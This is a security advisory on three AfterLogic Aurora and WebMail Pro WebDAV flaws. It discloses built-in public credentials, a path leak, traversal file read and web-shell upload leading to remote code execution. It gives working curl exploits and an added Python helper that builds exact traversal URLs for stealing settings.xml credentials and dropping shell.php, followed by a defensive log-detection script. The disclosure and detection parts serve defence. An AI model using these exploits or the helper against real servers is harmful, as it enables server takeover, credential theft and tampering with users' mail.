Seebug SSV:99169 (Knownsec, www.seebug.org) - Mar 29, 2021
AfterLogic multiple security vulnerabilities (CVE-2021-26292, CVE-2021-26293, CVE-2021-26294)


EPSS: 0.22 (Low), percentile 96.5%

CVE-2021-26292 - Public Full Path Disclosure on AfterLogic Aurora & WebMail Pro WebDAV EndPoint

The severity of the issue: Medium

Complexity: Easy

Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO

Authentication: Not required

Attacks: Full Path Disclosure

Resources :

Authors :

  • Emre KELEŞ - @emrekeles on Twitter
  • Emircan YILDIZ - @scorpsec on Twitter
  • Halil Emre ÖZEN - @halilemreozen on Twitter

Report Summary :

AfterLogic Aurora and WebMail Pro versions 7.7.9 and earlier are affected. Sending an HTTP DELETE request to the WebDAV endpoint, authenticated as the built-in "caldav_public_user@localhost" account with its predefined password "caldav_public_user", returns an error message that discloses the web root path.

To Reproduce :

Get the web root path with the following curl command

curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"

Response :

<?xml version="1.0" encoding="utf-8"?>
<d:error xmlns:d="DAV:" xmlns:s="http://sabredav.org/ns">
  <s:exception>Sabre\DAV\Exception\NotFound</s:exception>
  <s:message>File with name /var/www/html/www/webmailpro.dev/data/files/private/caldav_public_user@localhost/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 could not be located</s:message>
</d:error>

In this scenario, /var/www/html/www/webmailpro.dev is the web root path. Knowing it is especially valuable when chaining with file upload vulnerabilities, because the attacker can then place a file at a known, web-reachable location.

Technical Description:

  • dav\server.php (handles the request, create the \afterlogic\DAV\Server instance )
  • \libraries\Sabre\DAV\server.php -> exec (Pass the request method and uri to invokeMethod)
  • \libraries\Sabre\DAV\server.php -> invokeMethod
  • \libraries\Sabre\DAV\server.php -> httpDelete
  • \libraries\Sabre\DAV\Tree.php -> delete
  • \libraries\Sabre\DAV\ObjectTree.php -> getNodeForPath
  • \libraries\Sabre\DAV\FS\Directory.php -> getChild

The path disclosure originates at step 7, getChild: the exception is thrown as \Sabre\DAV\Exception\NotFound('File with name ' . $path . ' could not be located'), and $path is the absolute filesystem path, so the message carries the web root back to the client.

Any user who can log in can obtain the web root path this way. With caldav_public_user@localhost the attacker does not need any user information, because that account has a predefined password, so the vulnerability is effectively publicly accessible.

CVE-2021-26293 - RCE via Public unrestricted upload with path traversal on AfterLogic Aurora & WebMail Pro WebDAV EndPoint

Base Score: 9.8 CRITICAL

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Complexity: Easy

Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO

Authentication: Not required

Attacks: Directory Traversal, Unrestricted Upload of File with Dangerous Type, Public Built-in Credentials For Critical Function

Gained Access: WebServer user ( Apache, Nginx, Etc… )

Resources:

Authors:

  • Emre KELEŞ - @emrekeles on Twitter
  • Emircan YILDIZ - @scorpsec on Twitter
  • Halil Emre ÖZEN - @halilemreozen on Twitter

Report Summary:

AfterLogic Aurora and WebMail Pro versions 7.7.9 and earlier are affected. Sending an HTTP PUT request to the WebDAV endpoint, authenticated as the built-in "caldav_public_user@localhost" account with its predefined password "caldav_public_user", lets the attacker create or overwrite files with malicious content such as web shells or database dumpers.

After uploading a malicious PHP file to the web server, some example actions the attacker can take:

  1. Download or modify the database
    1. Email addresses with easily decodable passwords
    2. CalDAV data (calendars of the users)
    3. CardDAV data (contacts of the users)
  2. Download private files that users uploaded over WebDAV.
  3. Intercept webmail users' traffic to read or modify their email.
    1. A way to read email, because webmail servers are usually whitelisted on mail servers while normal clients are subject to thresholds
    2. A good way to spread malicious executables or mails to users without fighting mail gateways or spam blockers
    3. Acting as the real user and sending malicious emails to important users or companies
    4. Sending bulk emails for spam campaigns
  4. Attempt privilege escalation to obtain root/administrator on the server.

Etc.

To Reproduce:

Upload the malicious file with the following curl command

curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"

As the AfterLogic WebMail Pro docs mention, "the web root usually looks like /var/www/html", and the PoC above assumes the files are located under Apache's standard /var/www/html path. The path may differ depending on configuration, but that does not block the attacker, because some of the endpoints expose the document root path when an invalid path parameter is requested.

Ways to figure out the document root directory on customized web server configurations:

  1. Use an invalid path to trigger a SabreDAV error, which discloses the full path to the web root:
     curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
  2. Try common web server paths.
  3. Brute force: append another ../ to the URL until an HTTP 200 is returned for the uploaded malicious file.
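The two steps above (recover the web root from the NotFound message, then build a traversal path with the right number of ../ segments) can be automated so that no brute forcing is needed. The following Python helper is an added example, not code from the advisory or from AfterLogic: it parses the sample error body shown under CVE-2021-26292, strips the per-user suffix to get the web root, and builds the %2e%2e chain with exactly enough segments to reach the filesystem root, which serves both the PUT (CVE-2021-26293) and GET (CVE-2021-26294) requests. The error body is the one from the PoC, embedded as a constant; the mapping of /files/personal/ to <web root>/data/files/private/<user>/ is assumed from that same response.

```python
"""Recover the AfterLogic web root from a SabreDAV NotFound body and build the
traversal URL used by the PUT/GET PoCs.  Added example, not advisory or vendor code."""
import re
import xml.etree.ElementTree as ET

# Constructed sample: the error body shown in the CVE-2021-26292 PoC above.
SAMPLE_ERROR = """<?xml version="1.0" encoding="utf-8"?>
<d:error xmlns:d="DAV:" xmlns:s="http://sabredav.org/ns">
  <s:exception>Sabre\\DAV\\Exception\\NotFound</s:exception>
  <s:message>File with name /var/www/html/www/webmailpro.dev/data/files/private/caldav_public_user@localhost/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 could not be located</s:message>
</d:error>"""

SABRE_NS = "{http://sabredav.org/ns}"
PUBLIC_USER = "caldav_public_user@localhost"
MARKER = "GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
# Assumption taken from the PoC response: /files/personal/<x> for a user maps to
# <web_root>/data/files/private/<user>/<x> on disk.
PRIVATE_SUBDIR = "data/files/private"


def leaked_path(error_xml: str):
    """Return the absolute path embedded in a SabreDAV NotFound body, or None."""
    root = ET.fromstring(error_xml)
    exc = root.findtext(SABRE_NS + "exception") or ""
    if not exc.endswith("NotFound"):
        return None
    msg = root.findtext(SABRE_NS + "message") or ""
    m = re.search(r"File with name (\S+) could not be located", msg)
    return m.group(1) if m else None


def web_root(error_xml: str, user: str = PUBLIC_USER, marker: str = MARKER):
    """Strip the per-user private-files suffix to recover the web root."""
    path = leaked_path(error_xml)
    suffix = f"/{PRIVATE_SUBDIR}/{user}/{marker}"
    if path is None or not path.endswith(suffix):
        return None
    return path[: -len(suffix)]


def private_dir(root: str, user: str = PUBLIC_USER) -> str:
    """Directory that /dav/server.php/files/personal/ resolves to for `user`."""
    return f"{root.rstrip('/')}/{PRIVATE_SUBDIR}/{user}"


def hops_to_fs_root(directory: str) -> int:
    """Number of '..' segments needed to climb from `directory` to '/'."""
    return len([p for p in directory.split("/") if p])


def traversal_url(base: str, root: str, target_abs: str, user: str = PUBLIC_USER) -> str:
    """Build the PoC-style URL that makes the DAV FS backend touch `target_abs`.

    Emits exactly enough URL-encoded '..' segments to reach '/', so the same
    URL shape works for GET (read) and PUT (write) without guessing the depth.
    """
    hops = hops_to_fs_root(private_dir(root, user))
    climb = "/".join(["%2e%2e"] * hops)
    return f"{base.rstrip('/')}/dav/server.php/files/personal/{climb}/{target_abs.lstrip('/')}"


if __name__ == "__main__":
    root = web_root(SAMPLE_ERROR)
    print("web root:", root)
    print("read settings:", traversal_url("https://sample-mail.tld", root, f"{root}/data/settings/settings.xml"))
    print("write shell:  ", traversal_url("https://sample-mail.tld", root, "/var/www/html/shell.php"))
```

Feed the body of a real DELETE response into web_root() instead of the constant; if the server returns a generic error page rather than the SabreDAV XML, leaked_path() returns None and the brute-force fallback from the list above still applies.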

Technical Description:

  • dav\server.php (handles the request, create the \afterlogic\DAV\Server instance )
  • \libraries\Sabre\DAV\server.php -> exec (Pass the request method and uri to invokeMethod)
  • \libraries\Sabre\DAV\server.php -> invokeMethod
  • \libraries\Sabre\DAV\server.php -> httpPut
  • \libraries\Sabre\DAV\FS\File.php -> put

The unrestricted upload and directory traversal problem starts at step 2, exec: it neither sanitizes the supplied path nor checks the file extension, so the attacker can write into parent directories and then execute the uploaded file.

Any user who can log in can upload malicious files this way. With caldav_public_user@localhost the attacker does not need any user information, because that account has a predefined password, so the vulnerability is effectively publicly accessible.

CVE-2021-26294 - Exposure of sensitive information to an unauthorized actor with path traversal on AfterLogic Aurora & WebMail Pro WebDAV EndPoint

Base Score: 7.5 HIGH

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Complexity: Easy

Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO

Authentication: Not required

Attacks: Directory Traversal, Public Built-in Credentials For Critical Function

Resources :

https://owasp.org/www-community/attacks/Path_Traversal

Authors :

  • Emre KELEŞ - @emrekeles on Twitter
  • Emircan YILDIZ - @scorpsec on Twitter
  • Halil Emre ÖZEN - @halilemreozen on Twitter

Report Summary :

AfterLogic Aurora and WebMail Pro versions 7.7.9 and earlier are affected. Sending an HTTP GET request to the WebDAV endpoint, authenticated as the built-in "caldav_public_user@localhost" account with its predefined password "caldav_public_user", lets the attacker read any file under the web root.

To Reproduce :

Read any file with the following curl command

curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"

The sample curl command retrieves data/settings/settings.xml, which contains the license key, database credentials, admin panel credentials, etc.

Technical Description:

  • dav\server.php (handles the request, create the \afterlogic\DAV\Server instance )
  • \libraries\Sabre\DAV\server.php -> exec (Pass the request method and uri to invokeMethod)
  • \libraries\Sabre\DAV\server.php -> invokeMethod
  • \libraries\Sabre\DAV\server.php -> httpGet

The directory traversal problem starts at step 2, exec: it neither sanitizes the supplied path nor checks the file extension. Combined with the httpGet business logic (reading the file content and returning it), this lets the attacker read any file under the web root.

Any user who can log in can read configuration files this way. With caldav_public_user@localhost the attacker does not need any user information, because that account has a predefined password, so the vulnerability is effectively publicly accessible.
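For defenders, the three PoCs leave a distinctive trace in ordinary web server access logs: in the combined log format the Basic-auth user (Apache %u, Nginx $remote_user) is the built-in caldav_public_user@localhost account, and the request path carries URL-encoded .. segments. The following Python detector is an added example, not part of the advisory or of AfterLogic's software; the log lines are constructed to mirror the curl commands above (TEST-NET addresses), and the endpoint path, write-method list and PHP extensions are assumptions a deployment should adjust.

```python
"""Flag attempts matching the three AfterLogic WebDAV issues in combined-format
access logs.  Added example, not advisory or vendor code."""
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the PoC requests above.
SAMPLE_LOG = [
    '203.0.113.7 - caldav_public_user@localhost [29/Mar/2021:10:00:01 +0000] '
    '"DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1" 404 512 "-" "curl/7.68.0"',
    '203.0.113.7 - caldav_public_user@localhost [29/Mar/2021:10:00:05 +0000] '
    '"PUT /dav/server.php/files/personal/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/shell.php HTTP/1.1" 201 0 "-" "curl/7.68.0"',
    '203.0.113.7 - caldav_public_user@localhost [29/Mar/2021:10:00:09 +0000] '
    '"GET /dav/server.php/files/personal/%2e%2e/%2e%2e/%2e%2e/%2e%2e/data/settings/settings.xml HTTP/1.1" 200 4211 "-" "curl/7.68.0"',
    '198.51.100.4 - alice@example.org [29/Mar/2021:10:01:00 +0000] '
    '"PROPFIND /dav/server.php/calendars/alice@example.org/ HTTP/1.1" 207 3344 "-" "Thunderbird/78.0"',
    '198.51.100.9 - - [29/Mar/2021:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
]

# Combined log format: ip ident user [ts] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+'
)
PUBLIC_USER = "caldav_public_user@localhost"
DAV_ENDPOINT = "/dav/server.php"          # assumption: default install location
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH"}
PHP_EXTS = (".php", ".phtml", ".phar")


def parse_line(line: str):
    """Return the log fields as a dict, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(rec: dict) -> list:
    """Return the indicators that fire for one parsed request (empty list if clean)."""
    # Decode twice so %2e%2e and double-encoded %252e%252e both become '..'.
    path = unquote(unquote(rec["path"]))
    if not path.startswith(DAV_ENDPOINT):
        return []
    hits = []
    # The built-in account has no legitimate reason to modify anything
    # (CVE-2021-26292 uses DELETE, CVE-2021-26293 uses PUT).
    if rec["user"] == PUBLIC_USER and rec["method"] in WRITE_METHODS:
        hits.append("public-user-write")
    # Any '..' segment inside the DAV path is traversal (CVE-2021-26293/26294).
    if "/../" in path + "/":
        hits.append("path-traversal")
    # A PUT whose target is a PHP file is a web shell drop regardless of sender.
    if rec["method"] == "PUT" and path.lower().endswith(PHP_EXTS):
        hits.append("php-upload")
    return hits


def scan(lines) -> list:
    """Return (ip, method, status, indicators) for every suspicious line."""
    out = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec)
        if hits:
            out.append((rec["ip"], rec["method"], rec["status"], hits))
    return out


if __name__ == "__main__":
    for ip, method, status, hits in scan(SAMPLE_LOG):
        print(f"{ip} {method} {status} -> {', '.join(hits)}")
```

Run it on a real file with scan(open("/var/log/apache2/access.log")). The decode-twice step catches %252e but can also fire on a legitimately encoded file name, so treat path-traversal as a triage signal; public-user-write is the strongest indicator on its own, since that account should never issue write methods, and a PUT that returned 201 with php-upload set deserves an immediate look at the target path.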
